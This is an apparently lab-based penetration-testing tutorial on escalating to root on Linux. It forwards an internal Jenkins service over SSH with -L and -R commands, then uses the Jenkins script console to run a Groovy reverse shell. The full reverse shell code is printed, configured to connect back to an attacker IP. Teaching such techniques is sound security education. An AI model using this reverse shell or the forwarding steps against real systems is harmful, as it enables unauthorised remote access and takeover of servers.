Linux Privilege Escalation via Local and Remote Port Forwarding with SSH
Hello, my name is Lassag Mohamed Zakaria, i’m Cyber Security Penetration Tester.
Today, I’m gonna share with you, how you can exploit a vulnerable service runs on the Linux system, but it’s not accessible remotely, to elevate your privilege from simple user to root with Local and Remote Port Forwarding technique through SSH.
Requirements:
Shell on the Target Server.
SSH cred’s of the Target Server.
SSH cred’s of attacking machine.
Description:
Port forwarding is a technique that is used to give external devices access to computers and services are located on a private networks.
- Local Port Forwarding :
Local Port Forwarding is the common type of port forwarding. It is used to let a user connect from the local computer to another server or service, it allows you to forward traffic on a port of your local computer to the SSH server, which is forwarded to a destination server.
2. Remote Port Forwarding :
Remote port forwarding is the exact opposite of local port forwarding. In this, connections from the SSH server are forwarded via the SSH client, then to a destination server.
Scenario:
Let’s imagine that we are targeting a Linux server running on this IP address (10.10.191.232) while our IP address is (10.9.18.106).
By one of the Initial Access techniques, we gained a reverse shell on the Linux Server Target (10.10.191.232).
We check our user privilege on the system target and the kernel version.
In order to discover more about the system target, we have to check all files and folders in order to gain an information maybe can lead to sensitive action!
Below, in the screen number 2 , we discovered a cached ssh cred’s in a folder /opt/.
We can say that, we runned most of famous automated tools of Linux Privilege Escalation enumeration and we didn’t find any exploit or something can lead to elevate our privilege to root.
It’s always a good idea to check what is running internally or locally of services on the compromised system or machine.
Command : “netstat -ant”
In the screen number 3, we discovered some multiple services are running on the compromised system.
Let’s check one by one, and let’s start with the service that is running on port 8080, with Curl Linux Command.
Command : “curl -v 127.0.0.1:8080”
From the HTTP Response and the HTML source we got from the curl command, we can be sure that is Jenkins is the service that is running locally on this compromised machine.
Jenkins is an open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery.
Now, it is the Time of main topic.
Firstly, We have to carry that ssh service is running on our machine.
Let’s start with Remote Port Forwarding in order to make this locally service accessible from our local machine, then let’s try to exploit it in order to elevate our privilege on the system to Root.
On the target Server we run this command : ssh -R 8080:127.0.0.1:8080 kali@my-attacking-ip
ssh -R 8080:127.0.0.1:8080 kali@10.9.18.106
- R : Rmote port
- 127:0.0.1:8080: the vulnerable service with local ip
- kali@10.9.18.106 : our ssh cred’s of my local machine
Now, we have forwarded the connection to our local machine, and let’s run the netstat command, to see if there is a port opened on our machine.
The service of Jenkins now is accessible remotely from our machine.
The Second technique also is useful in this scenario, as the title of this topic, we will try to use Local Port Forwarding with ssh to make this locally service accessible remotely.
Local Port Forwarding command this time , it will be runned on my attcking machine, unlike the first time with a small modification.
Command on my attacking machine : sudo ssh -L 8080:127.0.0.1:8080 user@ssh-of-server-target
ssh -L 8080:127.0.0.1:8080 aubreanna@10.10.191.132
In the screen number 9 and 10 we see that the second tehnique which is Local Port Forwarding were successful also in this senario.
Privilege Escalation:
Let’s make another scenario of exploiting Jenkins to elevate our currently user on the compromised machine to root.
I won’t waste more time on scenarios, let’s imagine that we have found a method to gain the control panel of this service.
We will use these cred’s on my browser:
http://127.0.0.1:8080/login?from=%2F
Username : admin
Password : XXXX
The last step is, finding a way to upload or run our reverse shell code and run it.
URL: http://127.0.0.1:8080/script
This console allows a user to run commands for automation and reporting using a groovy script. By exploiting this privilege, the attacker can use revsh.groovy to get a reverse shell session back to the attacker machine.
Groovey Reverse shell:
String host=”localhost”;int port=8044;String cmd=”cmd.exe”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();We will have to change the value of three parameters.
- host : my ip address which is : 10.9.18.106
- port : my local port wich is : 4444
- cmd : “sh”
As we received our reverse shell connection from the compromased server, and after some researching, exploring and enumerating the service, we have found the root credentials.
Let’s use them and connect with ssh.
I hope you have enjoyed with this small scenario.
Best regards
